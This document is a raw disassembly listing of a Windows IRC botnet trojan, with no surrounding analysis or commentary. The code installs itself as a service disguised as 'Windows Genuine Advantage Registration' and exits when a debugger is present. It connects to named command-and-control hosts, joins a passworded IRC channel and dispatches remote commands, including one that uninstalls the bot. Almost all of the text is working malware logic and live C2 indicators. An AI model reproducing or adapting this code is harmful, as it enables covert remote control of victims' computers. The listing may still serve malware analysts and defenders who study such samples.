call dword_4010D0 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402625
loc_40261D: ; CODE XREF: sub_4025F4+1A�j
push 0
call dword_4010D4 ; ExitProcess
loc_402625: ; CODE XREF: sub_4025F4+27�j
call sub_4034DF
lea eax, [ebp+var_190]
push eax
push 101h
call dword_401144 ; WSAStartup
loc_40263C: ; CODE XREF: sub_4025F4+58�j
call sub_4028D3
push 4000h
call dword_4010DC ; Sleep
jmp short loc_40263C
sub_4025F4 endp
; ---------------------------------------------------------------------------
dw 0C3C9h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402650 proc near ; CODE XREF: MEW:004025D4�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 104h
push offset dword_401180
call dword_4010C0 ; GetSystemDirectoryA
push offset aWgareg_exe ; "wgareg.exe"
push offset dword_401180
push offset dword_4016B8
push offset dword_401180
call dword_401104 ; wsprintfA
add esp, 10h
push 20h
push offset dword_401180
call dword_4010C4 ; SetFileAttributesA
and [ebp+var_4], 0
jmp short loc_40269B
; ---------------------------------------------------------------------------
loc_402694: ; CODE XREF: sub_402650+74�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40269B: ; CODE XREF: sub_402650+42�j
cmp [ebp+var_4], 5
jge short loc_4026C6
push 0
push offset dword_401180
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
call dword_4010C8 ; CopyFileA
test eax, eax
jz short loc_4026B9
jmp short loc_4026C6
; ---------------------------------------------------------------------------
loc_4026B9: ; CODE XREF: sub_402650+65�j
push 1400h
call dword_4010DC ; Sleep
jmp short loc_402694
; ---------------------------------------------------------------------------
loc_4026C6: ; CODE XREF: sub_402650+4F�j
; sub_402650+67�j
call sub_4026D6
test eax, eax
jz short locret_4026D4
call sub_4037DC
locret_4026D4: ; CODE XREF: sub_402650+7D�j
leave
retn
sub_402650 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026D6 proc near ; CODE XREF: sub_402650:loc_4026C6�p
var_128 = byte ptr -128h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 128h
push 12h
push 0
push 0
call dword_401008 ; OpenSCManagerA
mov [ebp+var_18], eax
push 10h
push offset aWgareg ; "wgareg"
push [ebp+var_18]
call dword_401004 ; OpenServiceA
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz loc_4027A0
push 0
push 0
push 0
push 0
push 0
push offset dword_401180
push 0
push 2
push 110h
push 40012h
push offset aWindowsGenuine ; "Windows Genuine Advantage Registration "...
push offset aWgareg ; "wgareg"
push [ebp+var_18]
call dword_40103C ; CreateServiceA
mov [ebp+var_20], eax
mov [ebp+var_28], 1
and [ebp+var_24], 0
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_8], 1
lea eax, [ebp+var_28]
mov [ebp+var_4], eax
lea eax, [ebp+var_14]
push eax
push 2
push [ebp+var_20]
call dword_401028 ; ChangeServiceConfig2A
push 100h
push offset aEnsuresThatYou ; "Ensures that your copy of Microsoft Win"...
lea eax, [ebp+var_128]
push eax
call dword_4010BC ; lstrcpynA
lea eax, [ebp+var_128]
mov [ebp+var_1C], eax
lea eax, [ebp+var_1C]
push eax
push 1
push [ebp+var_20]
call dword_401028 ; ChangeServiceConfig2A
loc_4027A0: ; CODE XREF: sub_4026D6+2F�j
push 0
push 0
push [ebp+var_20]
call dword_401038 ; StartServiceA
leave
retn
sub_4026D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027AF proc near ; CODE XREF: sub_403062+16D�p
; sub_404CE7+1B2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push 10000h
push 0
push 0
call dword_401008 ; OpenSCManagerA
mov [ebp+var_4], eax
push 10000h
push offset aWgareg ; "wgareg"
push [ebp+var_4]
call dword_401004 ; OpenServiceA
mov [ebp+var_8], eax
push [ebp+var_8]
call dword_401010 ; DeleteService
push [ebp+var_8]
call dword_40100C ; CloseServiceHandle
push [ebp+var_4]
call dword_40100C ; CloseServiceHandle
call sub_4037DC
leave
retn
sub_4027AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027FE proc near ; CODE XREF: MEW:004025C1�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 104h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call dword_4010B8 ; GetModuleFileNameA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr aCM_unpackerPac[eax], 0 ; "C:\\m_unpacker\\packed.exe"
push 44h
push offset aD ; "D"
call sub_4038D9
mov dword ptr aD, 44h ; "D"
mov dword_40162C, 81h
and word_401630, 0
leave
retn
sub_4027FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40284B proc near ; CODE XREF: MEW:004025B5�p
push ebp
mov ebp, esp
push 0
push 0
push 0
push offset loc_402865
push 0
push 0
call dword_4010B4 ; CreateThread
pop ebp
retn
; ---------------------------------------------------------------------------
loc_402865: ; DATA XREF: sub_40284B+9�o
push ebp
mov ebp, esp
loc_402868: ; CODE XREF: sub_40284B+3A�j
call dword_4010B0 ; IsDebuggerPresent
test eax, eax
jz short loc_40287A
push 0
call dword_4010D4 ; ExitProcess
loc_40287A: ; CODE XREF: sub_40284B+25�j
push 80h
call dword_4010DC ; Sleep
jmp short loc_402868
sub_40284B endp
; ---------------------------------------------------------------------------
db 5Dh
db 0C2h, 4, 0
; ---------------------------------------------------------------------------
loc_40288B: ; DATA XREF: MEW:004025A6�o
push ebp
mov ebp, esp
sub esp, 20h
push offset loc_4028CC
push offset aWgareg ; "wgareg"
call dword_401018 ; RegisterServiceCtrlHandlerA
mov [ebp-20h], eax
mov dword ptr [ebp-1Ch], 10h
mov dword ptr [ebp-18h], 4
and dword ptr [ebp-14h], 0
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp-20h]
call dword_401014 ; SetServiceStatus
call sub_4025F4
; ---------------------------------------------------------------------------
dd 8C2C9h
; ---------------------------------------------------------------------------
loc_4028CC: ; DATA XREF: MEW:00402891�o
push ebp
mov ebp, esp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028D3 proc near ; CODE XREF: sub_4025F4:loc_40263C�p
var_544 = dword ptr -544h
var_540 = dword ptr -540h
var_53C = word ptr -53Ch
var_53A = word ptr -53Ah
var_538 = dword ptr -538h
var_52C = dword ptr -52Ch
var_528 = dword ptr -528h
var_524 = dword ptr -524h
var_520 = byte ptr -520h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 544h
call sub_403A18
cmp dword_401290, offset aBniu_househot_ ; "bniu.househot.com"
jnz short loc_402905
mov dword_401290, offset aYpgw_wallloan_ ; "ypgw.wallloan.com"
mov ax, word_4016F4
mov word_401294, ax
jmp short loc_40291B
; ---------------------------------------------------------------------------
loc_402905: ; CODE XREF: sub_4028D3+18�j
mov dword_401290, offset aBniu_househot_ ; "bniu.househot.com"
mov ax, word_4016DC
mov word_401294, ax
loc_40291B: ; CODE XREF: sub_4028D3+30�j
push dword_401290
call dword_401120 ; gethostbyname
mov [ebp+var_11C], eax
cmp [ebp+var_11C], 0
jnz short loc_40293B
jmp locret_402C51
; ---------------------------------------------------------------------------
loc_40293B: ; CODE XREF: sub_4028D3+61�j
and dword_40128C, 0
mov eax, dword_40128C
mov dword_401288, eax
mov eax, [ebp+var_11C]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_538], eax
mov [ebp+var_53C], 2
mov ax, word_401294
mov [ebp+var_53A], ax
push 6
push 1
push 2
call dword_401160 ; socket
mov dword_4014DC, eax
mov [ebp+var_10], 1
push 4
lea eax, [ebp+var_10]
push eax
push 8
push 0FFFFh
push dword_4014DC
call dword_401128 ; setsockopt
push 10h
lea eax, [ebp+var_53C]
push eax
push dword_4014DC
call dword_40112C ; connect
push 0
push 0Dh
push offset aUserLLLL ; "USeR l l l l\n"
push dword_4014DC
call dword_401130 ; send
call sub_4034BB
push 20h
push offset dword_401498
push offset dword_4014A8
call dword_4010BC ; lstrcpynA
push offset dword_4014A8
push offset aNick_24s ; "NiCK %.24s\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 0Ch
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
mov [ebp+var_4], 10h
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_53C]
push eax
push dword_4014DC
call dword_401134 ; getsockname
mov eax, [ebp+var_538]
mov dword_4014D4, eax
and [ebp+var_4], 0
and [ebp+var_118], 0
loc_402A51: ; CODE XREF: sub_4028D3+1F4�j
and [ebp+var_540], 0
jmp short loc_402A67
; ---------------------------------------------------------------------------
loc_402A5A: ; CODE XREF: sub_4028D3:loc_402A8C�j
mov eax, [ebp+var_540]
inc eax
mov [ebp+var_540], eax
loc_402A67: ; CODE XREF: sub_4028D3+185�j
mov eax, [ebp+var_540]
cmp eax, [ebp+var_118]
jnb short loc_402A8E
mov eax, [ebp+var_540]
mov eax, [ebp+eax*4+var_114]
cmp eax, dword_4014DC
jnz short loc_402A8C
jmp short loc_402A8E
; ---------------------------------------------------------------------------
loc_402A8C: ; CODE XREF: sub_4028D3+1B5�j
jmp short loc_402A5A
; ---------------------------------------------------------------------------
loc_402A8E: ; CODE XREF: sub_4028D3+1A0�j
; sub_4028D3+1B7�j
mov eax, [ebp+var_540]
cmp eax, [ebp+var_118]
jnz short loc_402AC5
cmp [ebp+var_118], 40h
jnb short loc_402AC5
mov eax, [ebp+var_540]
mov ecx, dword_4014DC
mov [ebp+eax*4+var_114], ecx
mov eax, [ebp+var_118]
inc eax
mov [ebp+var_118], eax
loc_402AC5: ; CODE XREF: sub_4028D3+1C7�j
; sub_4028D3+1D0�j
xor eax, eax
jnz short loc_402A51
mov eax, dword_401708
mov [ebp+var_528], eax
and [ebp+var_524], 0
loc_402ADB: ; CODE XREF: sub_4028D3+36D�j
lea eax, [ebp+var_528]
push eax
push 0
push 0
lea eax, [ebp+var_118]
push eax
push 0
call dword_401138 ; select
cmp eax, 1
jnz loc_402C45
push 0
mov eax, 400h
sub eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_520]
push eax
push dword_4014DC
call dword_40113C ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jg short loc_402B2E
jmp loc_402C45
; ---------------------------------------------------------------------------
loc_402B2E: ; CODE XREF: sub_4028D3+254�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+eax+var_520], 0
lea eax, [ebp+var_520]
mov [ebp+var_52C], eax
loc_402B4E: ; CODE XREF: sub_4028D3:loc_402BBB�j
mov eax, [ebp+var_52C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_402BBD
push 0Dh
push [ebp+var_52C]
call sub_40395A
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_402B8F
mov eax, [ebp+var_C]
mov byte ptr [eax], 0
push [ebp+var_52C]
call sub_402C9E
mov eax, [ebp+var_C]
inc eax
inc eax
mov [ebp+var_52C], eax
jmp short loc_402BBB
; ---------------------------------------------------------------------------
loc_402B8F: ; CODE XREF: sub_4028D3+29C�j
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_520]
sub eax, [ebp+var_52C]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
inc eax
push eax
push [ebp+var_52C]
lea eax, [ebp+var_520]
push eax
call sub_40392B
jmp short loc_402BC1
; ---------------------------------------------------------------------------
loc_402BBB: ; CODE XREF: sub_4028D3+2BA�j
jmp short loc_402B4E
; ---------------------------------------------------------------------------
loc_402BBD: ; CODE XREF: sub_4028D3+286�j
and [ebp+var_4], 0
loc_402BC1: ; CODE XREF: sub_4028D3+2E6�j
and [ebp+var_118], 0
loc_402BC8: ; CODE XREF: sub_4028D3+36B�j
and [ebp+var_544], 0
jmp short loc_402BDE
; ---------------------------------------------------------------------------
loc_402BD1: ; CODE XREF: sub_4028D3:loc_402C03�j
mov eax, [ebp+var_544]
inc eax
mov [ebp+var_544], eax
loc_402BDE: ; CODE XREF: sub_4028D3+2FC�j
mov eax, [ebp+var_544]
cmp eax, [ebp+var_118]
jnb short loc_402C05
mov eax, [ebp+var_544]
mov eax, [ebp+eax*4+var_114]
cmp eax, dword_4014DC
jnz short loc_402C03
jmp short loc_402C05
; ---------------------------------------------------------------------------
loc_402C03: ; CODE XREF: sub_4028D3+32C�j
jmp short loc_402BD1
; ---------------------------------------------------------------------------
loc_402C05: ; CODE XREF: sub_4028D3+317�j
; sub_4028D3+32E�j
mov eax, [ebp+var_544]
cmp eax, [ebp+var_118]
jnz short loc_402C3C
cmp [ebp+var_118], 40h
jnb short loc_402C3C
mov eax, [ebp+var_544]
mov ecx, dword_4014DC
mov [ebp+eax*4+var_114], ecx
mov eax, [ebp+var_118]
inc eax
mov [ebp+var_118], eax
loc_402C3C: ; CODE XREF: sub_4028D3+33E�j
; sub_4028D3+347�j
xor eax, eax
jnz short loc_402BC8
jmp loc_402ADB
; ---------------------------------------------------------------------------
loc_402C45: ; CODE XREF: sub_4028D3+225�j
; sub_4028D3+256�j
push dword_4014DC
call dword_401140 ; closesocket
locret_402C51: ; CODE XREF: sub_4028D3+63�j
leave
retn
sub_4028D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C53 proc near ; CODE XREF: sub_403062:loc_40342B�p
; sub_403062+40D�p ...
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
push [ebp+arg_0]
push offset dword_4016F8
push offset aPrivmsg_16s_48 ; "PRiVMSG %.16s :%.480s\n"
lea eax, [ebp+var_200]
push eax
call dword_401104 ; wsprintfA
add esp, 10h
mov [ebp+var_204], eax
push 0
push [ebp+var_204]
lea eax, [ebp+var_200]
push eax
push dword_4014DC
call dword_401130 ; send
leave
retn 4
sub_402C53 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C9E proc near ; CODE XREF: sub_4028D3+2AA�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_402CDD
mov eax, [ebp+arg_0]
inc eax
mov [ebp+var_4], eax
push 20h
push [ebp+var_4]
call sub_40395A
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_402CCE
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402CCE: ; CODE XREF: sub_402C9E+29�j
mov eax, [ebp+var_C]
mov byte ptr [eax], 0
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_402CE7
; ---------------------------------------------------------------------------
loc_402CDD: ; CODE XREF: sub_402C9E+F�j
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
loc_402CE7: ; CODE XREF: sub_402C9E+3D�j
push 20h
push [ebp+var_C]
call sub_40395A
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_402D01
jmp locret_40305E
; ---------------------------------------------------------------------------
db 0EBh
db 0Dh
; ---------------------------------------------------------------------------
loc_402D01: ; CODE XREF: sub_402C9E+5A�j
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
push offset aPing ; "PING"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz short loc_402D59
push [ebp+var_8]
push offset aPong_500s_0 ; "PoNG %.500s\r\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 0Ch
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402D59: ; CODE XREF: sub_402C9E+80�j
push offset aPrivmsg ; "PRIVMSG"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz loc_402E05
and [ebp+var_10], 0
cmp [ebp+var_4], 0
jz short loc_402D92
push [ebp+var_4]
push offset dword_401710
call sub_403E5B
cmp eax, 1
jnz short loc_402D92
mov [ebp+var_10], 1
loc_402D92: ; CODE XREF: sub_402C9E+D9�j
; sub_402C9E+EB�j
push 20h
push [ebp+var_8]
call sub_40395A
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_402E00
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_402DBE
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_402DBE: ; CODE XREF: sub_402C9E+117�j
cmp [ebp+var_10], 1
jnz short loc_402E00
mov eax, [ebp+var_14]
movsx eax, byte ptr [eax]
movsx ecx, byte_4016DA
cmp eax, ecx
jnz short loc_402DE3
push 0
mov eax, [ebp+var_14]
inc eax
push eax
call sub_403062
jmp short loc_402E00
; ---------------------------------------------------------------------------
loc_402DE3: ; CODE XREF: sub_402C9E+135�j
mov eax, [ebp+var_14]
movsx eax, byte ptr [eax]
movsx ecx, byte_4016DB
cmp eax, ecx
jnz short loc_402E00
push 1
mov eax, [ebp+var_14]
inc eax
push eax
call sub_403062
loc_402E00: ; CODE XREF: sub_402C9E+105�j
; sub_402C9E+124�j ...
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402E05: ; CODE XREF: sub_402C9E+CB�j
push offset a433 ; "433"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz short loc_402E72
cmp dword_40128C, 0
jnz short loc_402E6D
call sub_4034BB
push 20h
push offset dword_401498
push offset dword_4014A8
call dword_4010BC ; lstrcpynA
push offset dword_4014A8
push offset aNick_24s ; "NiCK %.24s\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 0Ch
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
loc_402E6D: ; CODE XREF: sub_402C9E+180�j
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402E72: ; CODE XREF: sub_402C9E+177�j
push offset a332 ; "332"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz loc_402F16
push 20h
push [ebp+var_8]
call sub_40395A
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_402EA4
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
jmp short loc_402EA9
; ---------------------------------------------------------------------------
loc_402EA4: ; CODE XREF: sub_402C9E+1FB�j
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402EA9: ; CODE XREF: sub_402C9E+204�j
push 20h
push [ebp+var_18]
call sub_40395A
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_402F11
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_402ED5
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_402ED5: ; CODE XREF: sub_402C9E+22E�j
mov eax, [ebp+var_18]
movsx eax, byte ptr [eax]
movsx ecx, byte_4016DA
cmp eax, ecx
jnz short loc_402EF4
push 0
mov eax, [ebp+var_18]
inc eax
push eax
call sub_403062
jmp short loc_402F11
; ---------------------------------------------------------------------------
loc_402EF4: ; CODE XREF: sub_402C9E+246�j
mov eax, [ebp+var_18]
movsx eax, byte ptr [eax]
movsx ecx, byte_4016DB
cmp eax, ecx
jnz short loc_402F11
push 1
mov eax, [ebp+var_18]
inc eax
push eax
call sub_403062
loc_402F11: ; CODE XREF: sub_402C9E+21C�j
; sub_402C9E+254�j ...
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402F16: ; CODE XREF: sub_402C9E+1E4�j
push offset a302 ; "302"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz loc_402FC4
cmp dword_401288, 0
jnz loc_402FC4
push 40h
push [ebp+var_8]
call sub_40395A
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_402FBA
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
push 20h
push [ebp+var_1C]
call sub_40395A
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_402F6C
mov eax, [ebp+var_20]
mov byte ptr [eax], 0
loc_402F6C: ; CODE XREF: sub_402C9E+2C6�j
push [ebp+var_1C]
call dword_40111C ; inet_addr
mov dword_4014D8, eax
cmp dword_4014D8, 0FFFFFFFFh
jnz short loc_402FB0
push [ebp+var_1C]
call dword_401120 ; gethostbyname
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_402FAE
mov eax, [ebp+var_24]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov dword_4014D8, eax
mov dword_401288, 1
loc_402FAE: ; CODE XREF: sub_402C9E+2F5�j
jmp short loc_402FBA
; ---------------------------------------------------------------------------
loc_402FB0: ; CODE XREF: sub_402C9E+2E3�j
mov dword_401288, 1
loc_402FBA: ; CODE XREF: sub_402C9E+2AC�j
; sub_402C9E:loc_402FAE�j
call sub_403A51
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402FC4: ; CODE XREF: sub_402C9E+288�j
; sub_402C9E+295�j
push offset a001 ; "001"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz locret_40305E
cmp dword_40128C, 0
jnz short locret_40305E
mov dword_40128C, 1
push offset dword_4014A8
push offset aUserhost_16s ; "USeRHOST %.16s\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 0Ch
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
push offset aNert4mp1 ; "nert4mp1"
push offset dword_4016F8
push offset aJoin_16s_16s ; "JOiN %.16s %.16s\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 10h
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
locret_40305E: ; CODE XREF: sub_402C9E+2B�j
; sub_402C9E+5C�j ...
leave
retn 4
sub_402C9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403062 proc near ; CODE XREF: sub_402C9E+13E�p
; sub_402C9E+15D�p ...
var_420 = dword ptr -420h
var_41C = byte ptr -41Ch
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov [ebp+var_420], eax
cmp [ebp+var_420], 61h
jg loc_403119
cmp [ebp+var_420], 61h
jz loc_4032F6
cmp [ebp+var_420], 49h
jg short loc_4030E0
cmp [ebp+var_420], 49h
jz loc_403338
cmp [ebp+var_420], 43h
jz loc_40332E
cmp [ebp+var_420], 44h
jz loc_403480
cmp [ebp+var_420], 45h
jz loc_403435
cmp [ebp+var_420], 46h
jz loc_4033B0
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4030E0: ; CODE XREF: sub_403062+36�j
cmp [ebp+var_420], 4Ch
jz loc_403394
cmp [ebp+var_420], 51h
jz loc_4031D9
cmp [ebp+var_420], 52h
jz loc_4031AE
cmp [ebp+var_420], 53h
jz loc_4033D9
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403119: ; CODE XREF: sub_403062+1C�j
cmp [ebp+var_420], 6Ch
jg short loc_403175
cmp [ebp+var_420], 6Ch
jz loc_403382
cmp [ebp+var_420], 63h
jz loc_403312
cmp [ebp+var_420], 65h
jz loc_403354
cmp [ebp+var_420], 66h
jz loc_4033A6
cmp [ebp+var_420], 68h
jz loc_403487
cmp [ebp+var_420], 69h
jz loc_4032AE
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403175: ; CODE XREF: sub_403062+BE�j
cmp [ebp+var_420], 6Eh
jz loc_4033E3
cmp [ebp+var_420], 71h
jz loc_4034A0
cmp [ebp+var_420], 73h
jz loc_4033BA
cmp [ebp+var_420], 75h
jz loc_403354
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4031AE: ; CODE XREF: sub_403062+9F�j
push 0
push 5
push offset aQuit ; "QUiT\n"
push dword_4014DC
call dword_401130 ; send
push dword_4014DC
call dword_401140 ; closesocket
call sub_4027AF
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4031D9: ; CODE XREF: sub_403062+92�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz loc_4032A9
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+var_40C], eax
and [ebp+var_408], 0
and [ebp+var_404], 0
jmp short loc_403212
; ---------------------------------------------------------------------------
loc_403204: ; CODE XREF: sub_403062+225�j
mov eax, [ebp+var_408]
inc eax
inc eax
mov [ebp+var_408], eax
loc_403212: ; CODE XREF: sub_403062+1A0�j
mov eax, [ebp+var_40C]
add eax, [ebp+var_408]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40328C
mov eax, [ebp+var_40C]
add eax, [ebp+var_408]
movsx eax, byte ptr [eax]
sub eax, 61h
shl eax, 4
mov ecx, [ebp+var_404]
mov [ebp+ecx+var_400], al
mov eax, [ebp+var_40C]
add eax, [ebp+var_408]
movsx eax, byte ptr [eax+1]
sub eax, 61h
movsx eax, al
mov ecx, [ebp+var_404]
movsx ecx, [ebp+ecx+var_400]
add ecx, eax
mov eax, [ebp+var_404]
mov [ebp+eax+var_400], cl
mov eax, [ebp+var_404]
inc eax
mov [ebp+var_404], eax
jmp loc_403204
; ---------------------------------------------------------------------------
loc_40328C: ; CODE XREF: sub_403062+1C1�j
mov eax, [ebp+var_404]
mov [ebp+eax+var_400], 0
push [ebp+arg_4]
lea eax, [ebp+var_400]
push eax
call sub_403062
loc_4032A9: ; CODE XREF: sub_403062+181�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4032AE: ; CODE XREF: sub_403062+108�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_4032F1
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
push offset a_500s ; "%.500s\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 0Ch
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
loc_4032F1: ; CODE XREF: sub_403062+256�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4032F6: ; CODE XREF: sub_403062+29�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_40330D
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_40553F
loc_40330D: ; CODE XREF: sub_403062+29E�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403312: ; CODE XREF: sub_403062+D4�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_403329
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_404F02
loc_403329: ; CODE XREF: sub_403062+2BA�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_40332E: ; CODE XREF: sub_403062+4C�j
call sub_404FBF
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403338: ; CODE XREF: sub_403062+3F�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_40334F
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_404FCE
loc_40334F: ; CODE XREF: sub_403062+2E0�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403354: ; CODE XREF: sub_403062+E1�j
; sub_403062+141�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_40337D
push [ebp+arg_4]
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
sub eax, 75h
neg eax
sbb eax, eax
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_404CE7
loc_40337D: ; CODE XREF: sub_403062+2FC�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403382: ; CODE XREF: sub_403062+C7�j
mov eax, [ebp+arg_4]
mov dword_40167C, eax
call sub_403A51
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403394: ; CODE XREF: sub_403062+85�j
mov eax, [ebp+arg_4]
mov dword_40167C, eax
call sub_403A96
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4033A6: ; CODE XREF: sub_403062+EE�j
call sub_4048CF
jmp locret_4034B7
; ---------------------------------------------------------------------------
